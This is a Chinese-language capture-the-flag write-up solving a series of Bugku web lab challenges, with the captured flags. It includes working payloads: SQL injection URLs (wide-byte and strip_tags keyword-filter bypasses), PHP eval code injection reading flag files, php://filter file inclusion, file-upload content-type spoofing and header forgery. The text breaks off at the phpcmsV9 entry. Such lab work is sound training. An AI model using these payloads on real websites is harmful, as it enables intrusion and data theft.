WEB#
WEB2#
听说聪明的人都能找到答案
http://120.24.86.145:8002/web2/
源码中有注释。 KEY{Web-2-bugKssNNikls9100}
文件上传测试#
http://103.238.227.13:10085/
Flag格式:Flag:xxxxxxxxxxxxx
Flag:42e97d465f962c53df9549377b513c7e
上传文件后缀为PHP且修改content-type 值为image/gif 等即可。
计算题#
地址:http://120.24.86.145:8002/yanzhengma/
修改前端限制。flag{CTF-bugku-0032}
web基础$_GET#
http://120.24.86.145:8002/get/
访问http://120.24.86.145:8002/get/?what=flag 。flag{bugku_get_su8kej2en}
web基础$_POST#
http://120.24.86.145:8002/post/
使用hackbar post what=flag 。 flag{bugku_get_ssseint67se}
你从哪里来#
http://120.24.86.145:9009/from.php
添加HTTP头 Referer:https://www.google.com
flag{bug-ku_ai_admin}
头等舱#
http://120.24.86.145:9009/hd.php
响应头 flag{Bugku_k8_23s_istra}: ,在f12直接看看不出来。
md5 collision(NUPT_CTF)#
http://120.24.86.145:9009/md5.php
http://120.24.86.145:9009/md5.php?a=s878926199a
flag{md5_collision_is_easy}
http://120.24.86.145:8002/get/index1.php
1
2
3
4
5
6
| $num=$_GET['num'];
if(!is_numeric($num)){
echo $num;
if($num==1)
echo 'flag{**********}';
}
|
http://120.24.86.145:8002/get/index1.php?num=1x
http://120.24.86.145:8002/get/index1.php?num=1e0x
flag{bugku-789-ps-ssdf}
WEB3#
flag就在这里快来找找吧
http://120.24.86.145:8002/web3/
CTRL+U;CTRL+W;CTRL+END 得到:
1
| <!--KEY{J2sa42ahJK-HS11III}-->
|
1
2
3
| s = 'KEY{J2sa42ahJK-HS11III}'
print ''.join(map(lambda x: chr(int(x)), s.strip('&#;').split(';&#')))
# KEY{J2sa42ahJK-HS11III}
|
SQL注入#
http://103.238.227.13:10083/
格式KEY{}
宽字节注入。
1
2
3
4
5
6
7
8
9
10
11
| http://103.238.227.13:10083/?id=1%dd'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1輁'' LIMIT 1' at line 1
http://103.238.227.13:10083/?id=1%dd'--+
正常返回
http://103.238.227.13:10083/?id=1%dd' order by 2--+
确定查询列数为2
http://103.238.227.13:10083/?id=1%dd' union select string,0 from `key` where id=1--+
54f3320dc261f313ba712eb3f13a1f6d
|
域名解析#
听说把 flag.bugku.com 解析到120.24.86.145 就能拿到flag
访问120.24.86.145 并burp抓包,修改host值为 flag.bugku.com 即可。KEY{DSAHDSJ82HDS2211}
SQL注入1#
地址:http://103.238.227.13:10087/
提示:过滤了关键字 你能绕过他吗
flag格式KEY{xxxxxxxxxxxxx}
部分过滤代码
1
2
3
4
5
6
7
8
9
10
11
12
| //过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
if (substr_count($id, $value) > 0)
{
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
|
strip_tags 用以从字符串中去除 HTML 和 PHP 标记,可利用其绕过sql关键字过滤。
1
2
3
4
5
6
7
8
| http://103.238.227.13:10087?id=1 an<a>d 1=2--+
验证过滤思路可行
http://103.238.227.13:10087?id=1 o<a>rder by 2--+
确定查询列数为2
http://103.238.227.13:10087?id=1 un<a>ion sel<a>ect 1,hash fr<a>om `key` where id=1--+
c3d3c17b4ca7f791f85e#$1cc72af274af4adef
|
你必须让他停下#
地址:http://120.24.86.145:8002/web12/
作者:@berTrAM
在chrome dev tool 里禁用js,然后手动刷新几次页面。页面里的图片地址不总是有效,有图片显示时(10.jpg)查看源码可见flag。或者burp抓包后重复发包几次。
flag{dummy_game_1s_s0_popular}
本地包含#
地址:http://120.24.86.145:8003/
1
2
3
4
5
6
7
8
9
10
11
| <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
---------------------------------------------------
view-source:http://120.24.86.145:8003/?hello=scandir('.')
view-source:http://120.24.86.145:8003/?hello=file('flag.php')
flag{bug-ctf-gg-99}
|
变量1#
http://120.24.86.145:8004/index1.php
1
2
3
4
5
6
7
8
9
10
11
| flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}?>
|
我们可以读取一个可变变量的值,但不知变量的名字,考虑超全局变量 。
1
2
3
| view-source:http://120.24.86.145:8004/index1.php?args=GLOBALS
["ZFkwe3"]=>
string(38) "flag{92853051ab894a64f7865cf3c2128b34}"
|
WEB5#
JSPFUCK??????答案格式CTF{**}
http://120.24.86.145:8002/web5/
字母大写
1
| ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])
|
在chrome console 运行。题目说字母大写。CTF{WHATFK}
WEB4#
看看源代码吧
http://120.24.86.145:8002/web4/
1
2
3
| var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
|
在chrome console 运行
1
2
3
| var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
unescape(p1) + unescape('%35%34%61%61%32' + p2);
|
得到
1
2
3
4
5
6
7
8
9
10
| function checkSubmit(){
var a=document.getElementById("password");
if("undefined"!=typeof a){
if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)
return!0;
alert("Error");
a.focus();return!1
}
}
document.getElementById("levelQuest").onsubmit=checkSubmit;
|
填入67d709b2b54aa2aa648cf6e87a7114f1 。KEY{J22JK-HS11}
flag在index里#
http://120.24.86.145:8005/post/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| //使用php的filter读取源码
//http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php
<html>
<title>Bugku-ctf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
|
phpcmsV9#
一个靶机而已,别搞破坏。
多谢各位大侠手下留情,flag在根目录里txt文件里
http://120.24.86.145:8001/
1
2
3
4
5
6
